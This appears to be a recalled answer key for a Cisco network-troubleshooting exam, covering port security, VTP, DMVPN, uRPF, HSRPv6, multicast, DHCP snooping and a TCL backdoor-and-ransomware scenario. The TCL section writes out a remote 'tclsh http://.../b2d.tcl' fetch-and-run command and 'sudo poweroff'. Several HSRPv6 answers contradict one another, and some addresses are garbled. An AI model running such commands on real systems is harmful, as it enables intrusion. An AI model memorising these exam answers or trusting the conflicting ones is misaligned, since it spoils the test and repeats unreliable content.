---OLD DIAG---

Ticket 1 (Port Security)

Hint: port connecting to host is down/down (PortFast and Port Security are configured, switch 3 has
wrong hardcoded MAC address – need to remove this or correct it with Host 1 MAC address)

Which switch has the problem?

 SW3
Which command to use for identifying the problem?
 show ip interface brief
Which information you will request to solve the problem?
 Device: Host 1
 Question: Ask Host1 MAC Address

Ticket 2 (VTP Password)

Hint: port connecting to host is up/up, but vtp revision number of SW3 (client) is 0, and SW4 (vtp server)
not 0. SW3 does not have all VLANs of SW4

Which switch has the problem?

 SW3
Which command to use for identifying the problem?
 show vtp status
Which information you will request to solve the problem?
 Device: SW3
 Question: Ask for VTP Password

Ticket 3 (DMVPN, route-map)

Hint: NBMA (public WAN) address of the Hub is advertised into DMVPN tunnel (midchain error;
recursive lookup) – R15 (hub) does not have route-map when redistributing connected

Which device has the problem?

 R15 (it is hub)
Which is the cause or resolution of the problem?
 Exclude Ethernet0/0 (NBMA interface) for EIGRP
 Suppress the NBMA advertisement on Hub (alternate option)
 Hub is injecting NBMA causing Recursive Routing (alternate option)

Ticket 4 (DMVPN, subnet)

Hint: R15 (hub) has route-map when redistributing connected which excludes NBMA. R15 has /30
NBMA IP address, but R16 has wrong subnet /29 instead of /30.

Which device has the problem?

 R16 (it is spoke)
Which is the cause or resolution of the problem?
 Increase the subnet mask length from /29 to /30 on Ethernet 0/2

1
Ticket 5 (uRPF, reply received in wrong interface)

R2

R1

R3

Given: R1-R2, R1-R3 are eBGP; R2-R3 iBGP. R1 configured uRPF on interface e0/2 (connected to R2)

Hint: R1 prefers R1-R3 path to access Web (8.8.8.8 or 0.0.0.0), but Web prefers R2-R1, different path to
access Host 1 (which is behind R1)

When a packet is received at the interface where Unicast RPF and ACLs:
1. Input ACLs are checked
2. Unicast RPF checks to see if the packet has arrived on the best return path by checking FIB table
3. CEF lookup is carried out for packet forwarding
4. Output ACLs are checked
5. The packet is forwarded

Why Host 1 is unable to ping web server:

1. R1 looks up its routing table (FIB) and selects interface E0/3 as Egress interface
2. R1 translates the source IP to its interface loopback 11
3. R1 transmits the icmp request to R3 via interface E0/3
4. Packets are received by R3 and forwarded to the destination
5. The destination replies with echo reply
6. The echo reply is routed via R2
7. R2 transmits the echo reply to R1 (R1 receives via E0/2, not the interface where it sent out)
8. Unicast RPF on R1 drops the echo reply (FIB table shows route to that source is via Eth0/3)

What is most likely cause of the problem?

 uRPF
 Asymmetric routing with unicast RPF

2
Ticket 6 (BGP Policy, ACL)
R2

R1

R3
3
Hint: No uRPF in this ticket. Input ACL is configured on R1’s eth1/0, link to R2.

Why Host 1 is unable to ping web server:

1. R1 looks up its routing table (FIB) and selects interface E2/0 as Egress interface
2. R1 translates the source IP to its interface loopback 11
3. R1 transmits the icmp request to R3 via interface E2/0
4. Packets are received by R3 and forwarded to the destination
5. The destination replies with echo reply
6. The echo reply is routed via R2
7. R2 transmits the echo reply to R1 (not same interface, but there is no uRPF, so does not matter)
8. ACL on R1 drops the echo reply

What is most likely cause of the problem?

 Traffic dropped via access list

Ticket 7 (New uRPF)

Given: same topology;
Hint:
1. R1 is configured for eBGP multipath and uRPF Loose mode; uses per destination load-balance
2. R2 and R3 are both uRPF Strict Mode, they prefer route to Loop11 and Loop12 via R3-R1
3. Logs on R1 (show ip cef exact route <hosts> <internet> shows that if path is towards R2, it is
dropped on R2; if path is towards R3, it will NOT be dropped.

Why Host 1 is unable to ping web server:

1. R1 receives icmp packet from Host 1
2. R1 looks up its routing table (FIB) and selects interface E1/0 (towards R2) as Egress interface
3. R1 translates the source IP to its interface loopback 11
4. R1 transmits the icmp request to R2 via interface E1/0
5. R2 receives the packet on the ingress interface
6. R2 performs RPF check for received packet
7. Packet fails RPF check because return path to R1 loopback11 is via R3.
8. R2 drops the packet (understand the flow)

What is most likely cause of the problem?

 uRPF Strict Mode with load-balance per destination. (in another version no RPF on R1 just to
confuse, but everything else is the same)
3
 ---NEW DIAG---
HSRPv6
HSRPv6 has been configured between two CE routers; each router connects to its own PE router. When
both routers are online no hosts are able to reach out to the internet and cannot reach PE routers.

Description:
 No IPv6 connection from LAN to Internet. CE1 and CE2 are configured in HSRP for IPv6, CE1 is
Active with Router-Preference Low and HSRP priority 200, CE2 is Standby with Router-
Preference High and HSRP priority 100. HSRP Preemption is configured on both.
Issue
 Router with Higher Router-Preference. Check console logs on Host, default route is pointing to
FE80:::666. (because the router with higher Router-preference, must have been configured with
higher HSRP priority. Only one router in HSRP groups is active, and current Active HSRP has
“Low” router-preference, but there is rouge device in LAN which has “Medium” better router-
preference, and hosts use information ND RA from Rouge device and select it as Gateway)
Resolve
 Set HSRP priority on CE2 to Highest (So it would become Active and start making Router
Advertisements with Route-Preference High)
Which line on Wireshark
 You may filter the RA, “icmpv6.type==134” or “icmpv6.nd.ra.flag.prf” The first RA frame
from ffe::666 is the answer (sequence number: 227, note it can be different and you may need
to search)

Other feedbacks:

Indicate which device has the possible cause of this issue.

 Answer: CE1 (router with high route-preference, but low HSRPv6 priority)
What would you do to resolve the issue?
 Answer: Raise the priority higher than 200 on CE1.
Indicate what information is possible cause of this issue?
 Answer: Choose the first HSRP negotiation packet.

What would you do to resolve the issue?

 Answer: Shut down the interface which is connecting to LAN on CE1.
What device is causing the issue and why?
 Device: unknown device in the LAN
Why:
 sending in high preference than default gateway
Indicate what information is possible cause of this issue?
 From the wireshark capture, you may filter the RA, “icmpv6.type==134” or
“icmpv6.nd.ra.flag.prf” The first RA frame from ffe::666 is the answer
4
Multicast
You are working in the network team and one of your responsibilities is to solve problems. There is a
problem in multicast network in this morning and Site3 cannot use IPTV services. (it can be site 2 as
well)

Indicate the possible cause of this issue

 Answer: No route to RP (10.1.4.0/24) on R3 (This could R2 depending on version)

What question you should ask network engineer at Site3?

 Answer: Why there is no route to 10.1.4.0/24 on R3?

Quick Solve
 Answer: Static (or mroute) route on R3 to RP (R4) ip route 10.1.4.1 0.0.0.0 10.0.0.17

Another Version:

Which device?
 Answer: R2

Cause
 Answer: wrong RP config

Resolve
 Answer: Ask RP Config

5
 ---NEWEST DIAG---
DHCP Snooping

Additional Information
Server1 = new install, cannot get DHCP IP from R1
Server2 = new install, successfully retrieved DHCP IP Address from R1.
R1 = DHCP server
SW1/SW2 = L2 only – Snooping only
SW3/SW4 = L2+L3.
SW1 is DHCP Snooping. All interfaces are trusted, even the access ports, with [ip dhcp-snooping
trust]. SW1 is also passing Option 82 data upstream.
SW3 is DHCP Relay with [ip dhcp relay information option] configured.
SW3 does NOT have [ip dhcp relay information trust-all] configured.
The packet capture shows DHCP-Discover messages only (in relation to DHCP). The packets are
tagged with dot1q.
Packets for DHCP-Offer, Request, and Accept are never seen

All inter-switch links are using EtherChannel.

All trunks are operational and passing all VLANs properly.
All VLANs are configured properly on the switches.

Switch with the Issue:

 It´s the relay switch (mine was SW3, can be different in other versions) and Cisco tells you
which Switch is the Relay Switch.

Which command helped me identify the issue on the switch?

 It´s show ip dhcp relay info trusted (it´s empty, so no interfaces trusted).

Where the packet capture was taken?

 Link between Relay Switch (SW3) and Snoop Switch (SW1) facing Server1.

Filter wireshark with bootp:

 Find first DHCP discovery message (check option 82 inside it) and select. Mine was #113.

6
TCL Script

Question 1
(Shows a PCAP)
 Filter wireshark with http.request.method==GET that will show you who GET the TCL
Script and who sends (the source who do a GET is the victim/router)
 With those IP´s (Source/Victim and Hacker) you can eliminate 4 out of 9 answers.
 To eliminate the last one you select: Hacker is trying to install ransomware via backdoor (the
other option is exact the opposite), so it´s easy to select the correct answers!

What is happening in the network?(chose 4)

a. tcp session from A to B
b. tcp session from B to A———————————3
c. HTTP session from A to B———————————1
d. http session from B to A
e. ransomware installed by backdoor———————————4
f. backdoor installed by ransomware
g. tcl script downloaded from A
h. tcl script downloaded from B———————————2
————
Answers
1. HTTP session from A to B (be careful as there is another option with HTTPS)
2. TCL script download from B
3. TCP session from B to A
4. ransomware installed by backdoor

For Understanding.
1. HTTP session from A to B (A clicks a link that it shouldn't and goes to B's fishing website.)
2. TCL script downloaded from B (A is the one running 'get' command, and downloads tcl from B
3. TCP session from B to A (After A runs tcl, it creates a backdoor port on itself and B connects to A
using this newly created backdoor.)
4. Ransomware is installed by backdoor (B installs a ransomware to A using backdoor previously
created)

-========

Question 2
Which command use to execute the attack?
a. sherkfest
b. sudo poweroff
c. tclsh:/ copy flash via http(tclsh http://<victim_ip_address>/b2d.tcl (maybe the tcl name changes
in your exam).

7
Question 3
Which command if issued from the hacker end can bring down the complete system?
a. sudo poweroff

Question 4
How to quickly fix this problem?
a. e kill, kill the process.